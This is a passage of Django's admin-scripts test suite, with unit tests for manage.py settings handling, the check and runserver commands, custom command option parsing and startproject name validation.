"minimal: manage.py can't execute user commands without appropriate settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=test_project.settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'test_project.settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class ManageAlternateSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: manage.py builtin commands fail with an error when no default settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_builtin_with_settings(self):
"alternate: manage.py builtin commands work with settings provided as argument"
args = ['check', '--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertOutput(out, SYSTEM_CHECK_MSG)
self.assertNoOutput(err)
def test_builtin_with_environment(self):
"alternate: manage.py builtin commands work if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'alternate_settings')
self.assertOutput(out, SYSTEM_CHECK_MSG)
self.assertNoOutput(err)
def test_builtin_with_bad_settings(self):
"alternate: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"alternate: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"alternate: manage.py can't execute user commands without settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?(test_project\.)?settings'?", regex=True)
def test_custom_command_with_settings(self):
"alternate: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
def test_custom_command_with_environment(self):
"alternate: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'alternate_settings')
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
def test_custom_command_output_color(self):
"alternate: manage.py output syntax color can be deactivated with the `--no-color` option"
args = ['noargs_command', '--no-color', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', True), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]")
self.assertNoOutput(err)
class ManageMultipleSettings(AdminScriptTestCase):
"""A series of tests for manage.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"multiple: manage.py builtin commands fail with an error when no settings provided"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No installed app with label 'admin_scripts'.")
def test_builtin_with_settings(self):
"multiple: manage.py builtin commands succeed if settings are provided as argument"
args = ['check', '--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_environment(self):
"multiple: manage.py can execute builtin commands if settings are provided in the environment"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, SYSTEM_CHECK_MSG)
def test_builtin_with_bad_settings(self):
"multiple: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['check', '--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_builtin_with_bad_environment(self):
"multiple: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['check', 'admin_scripts']
out, err = self.run_manage(args, 'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "No module named '?bad_settings'?", regex=True)
def test_custom_command(self):
"multiple: manage.py can't execute user commands using default settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"multiple: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
def test_custom_command_with_environment(self):
"multiple: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args, 'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command")
class ManageSettingsWithSettingsErrors(AdminScriptTestCase):
"""
Tests for manage.py when using the default settings.py file containing
runtime errors.
"""
def tearDown(self):
self.remove_settings('settings.py')
def write_settings_with_import_error(self, filename):
settings_file_path = os.path.join(test_dir, filename)
with open(settings_file_path, 'w') as settings_file:
settings_file.write('# Settings file automatically generated by admin_scripts test case\n')
settings_file.write('# The next line will cause an import error:\nimport foo42bar\n')
def test_import_error(self):
"""
        import error: manage.py builtin commands show useful diagnostic info
        when a settings module with an import error is provided (#14130).
"""
self.write_settings_with_import_error('settings.py')
args = ['check', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "No module named")
self.assertOutput(err, "foo42bar")
def test_attribute_error(self):
"""
        manage.py builtin commands do not swallow the AttributeError raised by
        bad settings (#18845).
"""
self.write_settings('settings.py', sdict={'BAD_VAR': 'INSTALLED_APPS.crash'})
args = ['collectstatic', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "AttributeError: 'list' object has no attribute 'crash'")
def test_key_error(self):
self.write_settings('settings.py', sdict={'BAD_VAR': 'DATABASES["blah"]'})
args = ['collectstatic', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "KeyError: 'blah'")
def test_help(self):
"""
        The 'help' output notes that only Django core commands are listed when
        settings errors prevent user commands from loading.
"""
self.write_settings('settings.py', sdict={'MEDIA_URL': '"/no_ending_slash"'})
args = ['help']
out, err = self.run_manage(args)
self.assertOutput(out, 'only Django core commands are listed')
self.assertNoOutput(err)
class ManageCheck(AdminScriptTestCase):
def tearDown(self):
self.remove_settings('settings.py')
def test_nonexistent_app(self):
""" manage.py check reports an error on a non-existent app in
INSTALLED_APPS """
self.write_settings('settings.py',
apps=['admin_scriptz.broken_app'],
sdict={'USE_I18N': False})
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'ImportError')
self.assertOutput(err, 'No module named')
self.assertOutput(err, 'admin_scriptz')
def test_broken_app(self):
""" manage.py check reports an ImportError if an app's models.py
raises one on import """
self.write_settings('settings.py', apps=['admin_scripts.broken_app'])
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'ImportError')
def test_complex_app(self):
""" manage.py check does not raise an ImportError validating a
complex app with nested calls to load_app """
self.write_settings(
'settings.py',
apps=[
'admin_scripts.complex_app',
'admin_scripts.simple_app',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.auth',
'django.contrib.contenttypes',
],
sdict={
'DEBUG': True
}
)
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertEqual(out, 'System check identified no issues (0 silenced).\n')
def test_app_with_import(self):
""" manage.py check does not raise errors when an app imports a base
class that itself has an abstract base. """
self.write_settings('settings.py',
apps=['admin_scripts.app_with_import',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sites'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertEqual(out, 'System check identified no issues (0 silenced).\n')
def test_output_format(self):
""" All errors/warnings should be sorted by level and by message. """
self.write_settings('settings.py',
apps=['admin_scripts.app_raising_messages',
'django.contrib.auth',
'django.contrib.contenttypes'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
expected_err = (
"SystemCheckError: System check identified some issues:\n"
"\n"
"ERRORS:\n"
"?: An error\n"
"\tHINT: Error hint\n"
"\n"
"WARNINGS:\n"
"a: Second warning\n"
"obj: First warning\n"
"\tHINT: Hint\n"
"\n"
"System check identified 3 issues (0 silenced).\n"
)
self.assertEqual(err, expected_err)
self.assertNoOutput(out)
def test_warning_does_not_halt(self):
"""
        When there are only warnings or less serious messages, Django should
        not prevent the user from launching their project, so the `check`
        command should not raise a `CommandError`. This test also checks the
        output format.
"""
self.write_settings('settings.py',
apps=['admin_scripts.app_raising_warning',
'django.contrib.auth',
'django.contrib.contenttypes'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
expected_err = (
"System check identified some issues:\n" # No "CommandError: " part
"\n"
"WARNINGS:\n"
"?: A warning\n"
"\n"
"System check identified 1 issue (0 silenced).\n"
)
self.assertEqual(err, expected_err)
self.assertNoOutput(out)
class CustomTestRunner(DiscoverRunner):
def __init__(self, *args, **kwargs):
assert 'liveserver' not in kwargs
super(CustomTestRunner, self).__init__(*args, **kwargs)
def run_tests(self, test_labels, extra_tests=None, **kwargs):
pass
class ManageTestCommand(AdminScriptTestCase):
def setUp(self):
from django.core.management.commands.test import Command as TestCommand
self.cmd = TestCommand()
def test_liveserver(self):
"""
Ensure that the --liveserver option sets the environment variable
correctly.
Refs #2879.
"""
# Backup original state
address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
self.cmd.handle(verbosity=0, testrunner='admin_scripts.tests.CustomTestRunner')
# Original state hasn't changed
self.assertEqual('DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ, address_predefined)
self.assertEqual(os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS'), old_address)
self.cmd.handle(verbosity=0, testrunner='admin_scripts.tests.CustomTestRunner',
liveserver='blah')
# Variable was correctly set
self.assertEqual(os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'], 'blah')
# Restore original state
if address_predefined:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
else:
del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
class ManageRunserver(AdminScriptTestCase):
def setUp(self):
from django.core.management.commands.runserver import Command
def monkey_run(*args, **options):
return
self.output = StringIO()
self.cmd = Command(stdout=self.output)
self.cmd.run = monkey_run
def assertServerSettings(self, addr, port, ipv6=None, raw_ipv6=False):
self.assertEqual(self.cmd.addr, addr)
self.assertEqual(self.cmd.port, port)
self.assertEqual(self.cmd.use_ipv6, ipv6)
self.assertEqual(self.cmd._raw_ipv6, raw_ipv6)
def test_runserver_addrport(self):
self.cmd.handle()
self.assertServerSettings('127.0.0.1', '8000')
self.cmd.handle(addrport="1.2.3.4:8000")
self.assertServerSettings('1.2.3.4', '8000')
self.cmd.handle(addrport="7000")
self.assertServerSettings('127.0.0.1', '7000')
@unittest.skipUnless(socket.has_ipv6, "platform doesn't support IPv6")
def test_runner_addrport_ipv6(self):
self.cmd.handle(addrport="", use_ipv6=True)
self.assertServerSettings('::1', '8000', ipv6=True, raw_ipv6=True)
self.cmd.handle(addrport="7000", use_ipv6=True)
self.assertServerSettings('::1', '7000', ipv6=True, raw_ipv6=True)
self.cmd.handle(addrport="[2001:0db8:1234:5678::9]:7000")
self.assertServerSettings('2001:0db8:1234:5678::9', '7000', ipv6=True, raw_ipv6=True)
def test_runner_hostname(self):
self.cmd.handle(addrport="localhost:8000")
self.assertServerSettings('localhost', '8000')
self.cmd.handle(addrport="test.domain.local:7000")
self.assertServerSettings('test.domain.local', '7000')
@unittest.skipUnless(socket.has_ipv6, "platform doesn't support IPv6")
def test_runner_hostname_ipv6(self):
self.cmd.handle(addrport="test.domain.local:7000", use_ipv6=True)
self.assertServerSettings('test.domain.local', '7000', ipv6=True)
def test_runner_ambiguous(self):
# Only 4 characters, all of which could be in an ipv6 address
self.cmd.handle(addrport="beef:7654")
self.assertServerSettings('beef', '7654')
# Uses only characters that could be in an ipv6 address
self.cmd.handle(addrport="deadbeef:7654")
self.assertServerSettings('deadbeef', '7654')
def test_no_database(self):
"""
Ensure runserver.check_migrations doesn't choke on empty DATABASES.
"""
tested_connections = ConnectionHandler({})
with mock.patch('django.core.management.commands.runserver.connections', new=tested_connections):
self.cmd.check_migrations()
def test_readonly_database(self):
"""
Ensure runserver.check_migrations doesn't choke when a database is read-only
(with possibly no django_migrations table).
"""
with mock.patch.object(
MigrationRecorder, 'ensure_schema',
side_effect=MigrationSchemaMissing()):
self.cmd.check_migrations()
# Check a warning is emitted
self.assertIn("Not checking migrations", self.output.getvalue())
class ManageRunserverEmptyAllowedHosts(AdminScriptTestCase):
def setUp(self):
self.write_settings('settings.py', sdict={
'ALLOWED_HOSTS': [],
'DEBUG': False,
})
def tearDown(self):
self.remove_settings('settings.py')
def test_empty_allowed_hosts_error(self):
out, err = self.run_manage(['runserver'])
self.assertNoOutput(out)
self.assertOutput(err, 'CommandError: You must set settings.ALLOWED_HOSTS if DEBUG is False.')
class ManageTestserver(AdminScriptTestCase):
from django.core.management.commands.testserver import Command as TestserverCommand
@mock.patch.object(TestserverCommand, 'handle')
def test_testserver_handle_params(self, mock_handle):
out = StringIO()
call_command('testserver', 'blah.json', stdout=out)
mock_handle.assert_called_with(
'blah.json',
stdout=out, settings=None, pythonpath=None, verbosity=1,
traceback=False, addrport='', no_color=False, use_ipv6=False,
skip_checks=True, interactive=True,
)
##########################################################################
# COMMAND PROCESSING TESTS
# Check that user-space commands are correctly handled - in particular,
# that arguments to the commands are correctly parsed and processed.
##########################################################################
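# The user commands exercised below (noargs_command, base_command,
# app_command, label_command, ...) are fixtures living under
# admin_scripts/management/commands/. The class below is a minimal sketch of
# such a command; it is illustrative only and is never discovered by Django,
# since it doesn't live in a management.commands package.
class _ExampleCommand(BaseCommand):
    help = "Prints how its options were parsed, like the test fixtures do."

    def add_arguments(self, parser):
        parser.add_argument('--option_a', '-a', default='1')

    def handle(self, *args, **options):
        self.stdout.write("EXECUTE: example options=%s" % sorted(options.items()))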
class CommandTypes(AdminScriptTestCase):
"Tests for the various types of base command types that can be defined."
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_version(self):
"version is handled as a special case"
args = ['version']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, get_version())
def test_version_alternative(self):
"--version is equivalent to version"
args1, args2 = ['version'], ['--version']
# It's possible one outputs on stderr and the other on stdout, hence the set
self.assertEqual(set(self.run_manage(args1)), set(self.run_manage(args2)))
def test_help(self):
"help is handled as a special case"
args = ['help']
out, err = self.run_manage(args)
self.assertOutput(out, "Type 'manage.py help <subcommand>' for help on a specific subcommand.")
self.assertOutput(out, '[django]')
self.assertOutput(out, 'startapp')
self.assertOutput(out, 'startproject')
def test_help_commands(self):
"help --commands shows the list of all available commands"
args = ['help', '--commands']
out, err = self.run_manage(args)
self.assertNotInOutput(out, 'usage:')
self.assertNotInOutput(out, 'Options:')
self.assertNotInOutput(out, '[django]')
self.assertOutput(out, 'startapp')
self.assertOutput(out, 'startproject')
self.assertNotInOutput(out, '\n\n')
def test_help_alternative(self):
"--help is equivalent to help"
args1, args2 = ['help'], ['--help']
self.assertEqual(self.run_manage(args1), self.run_manage(args2))
    def test_help_short_alternative(self):
"-h is handled as a short form of --help"
args1, args2 = ['--help'], ['-h']
self.assertEqual(self.run_manage(args1), self.run_manage(args2))
def test_specific_help(self):
"--help can be used on a specific command"
args = ['check', '--help']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "Checks the entire Django project for potential problems.")
def test_color_style(self):
style = color.no_style()
self.assertEqual(style.ERROR('Hello, world!'), 'Hello, world!')
style = color.make_style('nocolor')
self.assertEqual(style.ERROR('Hello, world!'), 'Hello, world!')
style = color.make_style('dark')
self.assertIn('Hello, world!', style.ERROR('Hello, world!'))
self.assertNotEqual(style.ERROR('Hello, world!'), 'Hello, world!')
# Default palette has color.
style = color.make_style('')
self.assertIn('Hello, world!', style.ERROR('Hello, world!'))
self.assertNotEqual(style.ERROR('Hello, world!'), 'Hello, world!')
def test_command_color(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write('Hello, world!', self.style.ERROR)
self.stderr.write('Hello, world!', self.style.ERROR)
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err)
command.execute()
if color.supports_color():
self.assertIn('Hello, world!\n', out.getvalue())
self.assertIn('Hello, world!\n', err.getvalue())
self.assertNotEqual(out.getvalue(), 'Hello, world!\n')
self.assertNotEqual(err.getvalue(), 'Hello, world!\n')
else:
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
def test_command_no_color(self):
"--no-color prevent colorization of the output"
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write('Hello, world!', self.style.ERROR)
self.stderr.write('Hello, world!', self.style.ERROR)
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err, no_color=True)
command.execute()
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err)
command.execute(no_color=True)
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
def test_custom_stdout(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write("Hello, World!")
out = StringIO()
command = Command(stdout=out)
command.execute()
self.assertEqual(out.getvalue(), "Hello, World!\n")
out.truncate(0)
new_out = StringIO()
command.execute(stdout=new_out)
self.assertEqual(out.getvalue(), "")
self.assertEqual(new_out.getvalue(), "Hello, World!\n")
def test_custom_stderr(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stderr.write("Hello, World!")
err = StringIO()
command = Command(stderr=err)
command.execute()
self.assertEqual(err.getvalue(), "Hello, World!\n")
err.truncate(0)
new_err = StringIO()
command.execute(stderr=new_err)
self.assertEqual(err.getvalue(), "")
self.assertEqual(new_err.getvalue(), "Hello, World!\n")
def test_base_command(self):
"User BaseCommands can execute when a label is provided"
args = ['base_command', 'testlabel']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels)
def test_base_command_no_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command']
expected_labels = "()"
self._test_base_command(args, expected_labels)
def test_base_command_multiple_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command', 'testlabel', 'anotherlabel']
expected_labels = "('testlabel', 'anotherlabel')"
self._test_base_command(args, expected_labels)
def test_base_command_with_option(self):
"User BaseCommands can execute with options when a label is provided"
args = ['base_command', 'testlabel', '--option_a=x']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels, option_a="'x'")
def test_base_command_with_options(self):
"User BaseCommands can execute with multiple options when a label is provided"
args = ['base_command', 'testlabel', '-a', 'x', '--option_b=y']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels, option_a="'x'", option_b="'y'")
def test_base_command_with_wrong_option(self):
"User BaseCommands outputs command usage when wrong option is specified"
args = ['base_command', '--invalid']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "usage: manage.py base_command")
self.assertOutput(err, "error: unrecognized arguments: --invalid")
def _test_base_command(self, args, labels, option_a="'1'", option_b="'2'"):
out, err = self.run_manage(args)
expected_out = (
"EXECUTE:BaseCommand labels=%s, "
"options=[('no_color', False), ('option_a', %s), ('option_b', %s), "
"('option_c', '3'), ('pythonpath', None), ('settings', None), "
"('traceback', False), ('verbosity', 1)]") % (labels, option_a, option_b)
self.assertNoOutput(err)
self.assertOutput(out, expected_out)
def test_base_run_from_argv(self):
"""
Test run_from_argv properly terminates even with custom execute() (#19665)
Also test proper traceback display.
"""
err = StringIO()
command = BaseCommand(stderr=err)
def raise_command_error(*args, **kwargs):
raise CommandError("Custom error")
command.execute = lambda args: args # This will trigger TypeError
# If the Exception is not CommandError it should always
# raise the original exception.
with self.assertRaises(TypeError):
command.run_from_argv(['', ''])
# If the Exception is CommandError and --traceback is not present
        # this command should raise a SystemExit and not print any
        # traceback to stderr.
command.execute = raise_command_error
err.truncate(0)
with self.assertRaises(SystemExit):
command.run_from_argv(['', ''])
err_message = err.getvalue()
self.assertNotIn("Traceback", err_message)
self.assertIn("CommandError", err_message)
# If the Exception is CommandError and --traceback is present
# this command should raise the original CommandError as if it
# were not a CommandError.
err.truncate(0)
with self.assertRaises(CommandError):
command.run_from_argv(['', '', '--traceback'])
def test_run_from_argv_non_ascii_error(self):
"""
        Test that a non-ASCII CommandError message does not raise a
        UnicodeDecodeError in run_from_argv.
"""
def raise_command_error(*args, **kwargs):
raise CommandError("Erreur personnalisée")
command = BaseCommand(stderr=StringIO())
command.execute = raise_command_error
with self.assertRaises(SystemExit):
command.run_from_argv(['', ''])
def test_run_from_argv_closes_connections(self):
"""
A command called from the command line should close connections after
being executed (#21255).
"""
command = BaseCommand(stderr=StringIO())
command.check = lambda: []
command.handle = lambda *args, **kwargs: args
with mock.patch('django.core.management.base.connections') as mock_connections:
command.run_from_argv(['', ''])
# Test connections have been closed
self.assertTrue(mock_connections.close_all.called)
def test_noargs(self):
"NoArg Commands can be executed"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_noargs_with_args(self):
"NoArg Commands raise an error if an argument is provided"
args = ['noargs_command', 'argument']
out, err = self.run_manage(args)
self.assertOutput(err, "error: unrecognized arguments: argument")
def test_app_command(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'auth']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.auth, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_app_command_no_apps(self):
"User AppCommands raise an error when no app name is provided"
args = ['app_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'error: Enter at least one application label.')
def test_app_command_multiple_apps(self):
"User AppCommands raise an error when multiple app names are provided"
args = ['app_command', 'auth', 'contenttypes']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.auth, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.contenttypes, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_app_command_invalid_app_label(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "No installed app with label 'NOT_AN_APP'.")
def test_app_command_some_invalid_app_labels(self):
"User AppCommands can execute when some of the provided app names are invalid"
args = ['app_command', 'auth', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "No installed app with label 'NOT_AN_APP'.")
def test_label_command(self):
"User LabelCommands can execute when a label is provided"
args = ['label_command', 'testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_label_command_no_label(self):
"User LabelCommands raise an error if no label is provided"
args = ['label_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Enter at least one label')
def test_label_command_multiple_label(self):
"User LabelCommands are executed multiple times if multiple labels are provided"
args = ['label_command', 'testlabel', 'anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertOutput(out, "EXECUTE:LabelCommand label=anotherlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
class Discovery(SimpleTestCase):
def test_precedence(self):
"""
Apps listed first in INSTALLED_APPS have precedence.
"""
with self.settings(INSTALLED_APPS=['admin_scripts.complex_app',
'admin_scripts.simple_app',
'django.contrib.auth',
'django.contrib.contenttypes']):
out = StringIO()
call_command('duplicate', stdout=out)
self.assertEqual(out.getvalue().strip(), 'complex_app')
with self.settings(INSTALLED_APPS=['admin_scripts.simple_app',
'admin_scripts.complex_app',
'django.contrib.auth',
'django.contrib.contenttypes']):
out = StringIO()
call_command('duplicate', stdout=out)
self.assertEqual(out.getvalue().strip(), 'simple_app')
class ArgumentOrder(AdminScriptTestCase):
"""Tests for 2-stage argument parsing scheme.
django-admin command arguments are parsed in 2 parts; the core arguments
(--settings, --traceback and --pythonpath) are parsed using a basic parser,
ignoring any unknown options. Then, once settings are configured, the
full argument list is passed to the command's own parser, which extracts
the options of interest to the individual command.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_setting_then_option(self):
""" Options passed after settings are correctly handled. """
args = ['base_command', 'testlabel', '--settings=alternate_settings', '--option_a=x']
self._test(args)
def test_setting_then_short_option(self):
""" Short options passed after settings are correctly handled. """
args = ['base_command', 'testlabel', '--settings=alternate_settings', '-a', 'x']
self._test(args)
def test_option_then_setting(self):
""" Options passed before settings are correctly handled. """
args = ['base_command', 'testlabel', '--option_a=x', '--settings=alternate_settings']
self._test(args)
def test_short_option_then_setting(self):
""" Short options passed before settings are correctly handled. """
args = ['base_command', 'testlabel', '-a', 'x', '--settings=alternate_settings']
self._test(args)
def test_option_then_setting_then_option(self):
""" Options are correctly handled when they are passed before and after
a setting. """
args = ['base_command', 'testlabel', '--option_a=x', '--settings=alternate_settings', '--option_b=y']
self._test(args, option_b="'y'")
def _test(self, args, option_b="'2'"):
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('no_color', False), ('option_a', 'x'), ('option_b', %s), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]" % option_b)
@override_settings(ROOT_URLCONF='admin_scripts.urls')
class StartProject(LiveServerTestCase, AdminScriptTestCase):
available_apps = [
'admin_scripts',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
]
def test_wrong_args(self):
"Make sure passing the wrong kinds of arguments outputs an error and prints usage"
out, err = self.run_django_admin(['startproject'])
self.assertNoOutput(out)
self.assertOutput(err, "usage:")
self.assertOutput(err, "You must provide a project name.")
def test_simple_project(self):
"Make sure the startproject management command creates a project"
args = ['startproject', 'testproject']
testproject_dir = os.path.join(test_dir, 'testproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
# running again..
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "already exists")
def test_invalid_project_name(self):
"Make sure the startproject management command validates a project name"
for bad_name in ('7testproject', '../testproject'):
args = ['startproject', bad_name]
testproject_dir = os.path.join(test_dir, bad_name)
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertOutput(err, "Error: '%s' is not a valid project name. "
"Please make sure the name begins with a letter or underscore." % bad_name)
self.assertFalse(os.path.exists(testproject_dir))
def test_simple_project_different_directory(self):
"Make sure the startproject management command creates a project in a specific directory"
args = ['startproject', 'testproject', 'othertestproject']
testproject_dir = os.path.join(test_dir, 'othertestproject')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'manage.py')))
# running again..
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "already exists")
def test_custom_project_template(self):
"Make sure the startproject management command is able to use a different project template"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
